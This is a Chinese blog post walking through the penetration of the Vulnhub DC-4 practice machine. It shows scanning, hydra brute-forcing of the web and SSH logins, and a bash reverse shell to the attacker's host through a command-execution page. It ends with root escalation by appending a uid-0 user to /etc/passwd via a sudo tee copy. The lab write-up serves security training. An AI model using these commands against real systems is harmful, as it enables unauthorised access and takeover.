Vulnhub DC-4靶机渗透

最新推荐文章于 2024-08-22 19:51:07 发布
最新推荐文章于 2024-08-22 19:51:07 发布
阅读量346 收藏
点赞数
文章标签: 安全 网络 linux Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45908624/article/details/128796789
版权

环境准备

DC-4靶机 ip:???????

kali攻击机 ip:192.168.153.128

一、信息收集

kali攻击机中,使用 arp-scan -l 扫描c段(-l为扫描c段)确定靶机IP地址为192.168.153.129

对目标靶机使用nmap端口扫描

nmap -sV 192.168.153.129 扫描靶机开放端口(-sV探测服务软件的版本)

探测到目标开放了22端口和80端口,访问目标80端口,发现是一个登录页面,随便尝试登陆一下,发现登录失败不会有任何提示。sql注入貌似也不存在。使用gobuster 扫一下目标目录。

gobuster dir -u http://192.168.153.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php

发现这几个目录想要访问都需要先登录。。。。唉,最不愿意的东西,那就爆破登录吧。。

二、hydra爆破密码

因为登录页面的一句“Admin Information Systems Login”登录用户名大概率admin没跑了,根据网站目录扫描结果,可以推测登录成功后会跳转到/command.php页面,也许页面有command这个单词,尝试用hydra的登录成功提示进行扫描。

备注:密码本是网上找的

hydra -l admin -P 133127.txt 192.168.153.129 http-post-form "/login.php:username=^USER^&password=^PASS^:S=command"

爆破得到admin的密码为happy,登录一下,成功登录

点击command,跳转到/command.php页面,点击run,发现执行了系统命令

三、利用RCE(远程代码执行)漏洞getshell

打开bp抓包,抓取run的数据包,发送到repeater模块

在kali开启8888监听端口

nc -nlvp 8888

bash -c 'exec bash -i &>/dev/tcp/192.168.153.128/8888 <&1'在burp的decoder模块进行URL编码(攻击机IP)

用编码后的结果替代radio的值并发送

kali攻击机成功获取到www-data的shell

进去溜达溜达左右看看,在/home目录下发现三个用户目录

在/home/jim/backups目录下有个叫old-passwords.bak的文件,里面有很多密码串

在靶机上/home/jim/backups目录下用python3起http服务

python3 -m http.server 9999

kali攻击机上用wget下载old-passwords.bak

wget http://192.168.153.129:9999/old-passwords.bak

获得密码本备份后,使用hydra尝试爆破jim的ssh登录密码

hydra -l jim -P old-passwords.bak ssh://192.168.153.129

以用户名jim,密码jibril04进行登录,成功登录靶机

使用sudo -l 发现jim账户无法sudo

在/home/jim目录下,有个mbox文件,查看文件,是一封来自root的邮件看看内容没什么有用的

有没有其他邮件呢?全局搜索mail相关的文件和文件夹

find / -name mail 2>/dev/null

在/var/mail和/var/spool/mail有一封相同的邮件,文件名叫jim,内容如下,从图中可见,charles的密码是^xHhA&hvim0y

切换到charles账户

四、sudo tee提权

切换到charles,然后执行sudo -l发现charles可以以root身份执行/usr/bin/teehee

由于/usr/bin/teehee是个自创命令,因此可以先执行/usr/bin/teehee --help来看看这个命令怎么使用

从命令帮助来看,这个应该就是tee命令的副本,功能和tee命令是一样的

试试用tee命令的提权方法来提权:

在靶机的/etc/passwd文件中新增一个用户fancy,密码为123456,其他都和root用户一致,具体操作如下

1)在攻击机上用openssl生成写入passwd的用户的密码md5散列

openssl passwd -1 -salt dc4 123456

得到$1$dc4$et4u0w92ZYIY4bsJE/gJG0

2)在靶机/etc/passwd文件中新增用户fancy

echo 'fancy:$1$dc4$et4u0w92ZYIY4bsJE/gJG0:0:0:root:/root:/bin/bash' | sudo /usr/bin/teehee -a /etc/passwd

3)su - fancy密码为刚刚设置的123456成功提权到root

进入root以后去找找新发现吧,在/root下,发现一个flag.txt文件

cat flag.txt成功找到flag

LZ_KaiHuang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
滥用sudo 权限的提权 DC-4靶机
m0_46580995的博客
09-16 280
靶机开放了22 80 端口 给了用户名Admin 通过 /usr/share/wordlists/rockyou.txt 进行爆破得到密码happy 在command.php下有 通过抓包发现是由post执行指令 在/home/jim/backups发现一个old-passwords.bak cat一下 得到一串密码 再查看/etc/passwd 使用现有的用户名和密码进行暴力破解ssh hydra -L 用户名 -P 密码 192.168.1.100 ssh 爆破出用户名jim时密码为jibril
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1578
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
vulnhub DC-5 靶机 渗透测试
小松博客
05-23 289
我们把这个文件复制出来 /usr/share/exploitdb/exploits/linux/local/41154.sh。进入shell模式,输入命令find / -perm /4000 2>/dev/null,查找具有SUID权限的命令。发现这下面的时间是在变的,每次刷新都不一样,这里和footer.php的php是一样的,所以我们推测是文件包含漏洞。注意,请不要在kali里面编译,亲测编译后的程序在靶机运行会报错,我是在Centos中编译的。发现一个footer.php,发现每次访问都不一样。
[Vulnhub] DC-1靶机渗透
weixin_45605352的博客
08-03 227
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了22端口(SSH服务)、80端口(HTTP服务)、111端口和57345端口(RPC服务) 0x02 web渗透 访问80端口 ...
[Vulnhub] DC-9靶机渗透
weixin_45605352的博客
08-10 465
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-9,412/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了80端口(HTTP服务),22端口存在过滤机制(SSH服务) 0x02 web渗透 访问80端口,没判断出是什么CMS: 目录扫描,发现登录入口: xray扫描出一个sql注入: 尝试注入: 丢到
vulnhub DC-4 靶机 渗透测试
小松博客
05-21 148
尝试sudo -l查看可以使用的命令,发现没权执行sudo,然后又找了半天,在/var/mail找到了一个叫jim的文件,打开是一封信,里面有个密码^xHhA&hvim0y,发信人是Charles。设置用户名为admin,因为虽然我们不确定他的用户名百分百是admin,但是在网页内容上显示的是Admin Information Systems Login,借此我们可以假定用户名是admin。登陆进去以后,发现一个List file功能,可以列出文件列表,通过抓包发现他发送的是一个system命令。
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3895
DC-4靶机渗透测试详细教程
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1023
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶
rumil的博客
04-17 1325
通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过我们得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码。回到后台,等登录即可,进入后台,发现有命令工具,进入查看,点击run,发现执行了ls -l命令得回显内容,抓包看一下。然后我们再次通过charles用户进行远程登录,成功登录,发现也有邮件,查看一下,并无有用的信息。去往此目录,查看jim文件得内容信息,发现charles发来的邮件,并有连接密码。
dc-4 靶机渗透学习
..
03-19 3102
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
叉车ai行人防撞预警系统,前后盲区防撞报警,让行车更安全
jiuxindianzi的博客
08-20 515
九盾叉车AI防撞预警系统,含九配件,三颗摄像头监测盲区与疲劳,可选车速等配件增强安全监测。特点包括实时监测、动态规划、高精度定位、多级防撞等,全方位保障叉车操作安全
OV SSL证书:增强网站信任与安全的重要保障
alsknv的博客
08-20 1300
OV SSL证书,全称为Organization Validation SSL证书,是一种需要通过验证网站或组织真实身份才能颁发的SSL证书。它不仅能为网站提供数据传输的加密功能,还能向用户展示网站的真实身份,增强用户的信任感。OV证书适用于所有需要在线信任和安全的网站,特别是电子商务网站、在线银行、金融机构以及企业门户网站等。OV SSL证书_企业验证级SSL证书-JoySSLOV是英文单词Organization Validation的缩写,即单位组织信息验证。
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
一点硬件
08-20 325
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
92.WEB渗透测试-信息收集-Google语法(6)
最新发布
计算机王的博客
08-22 318
web渗透测试
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值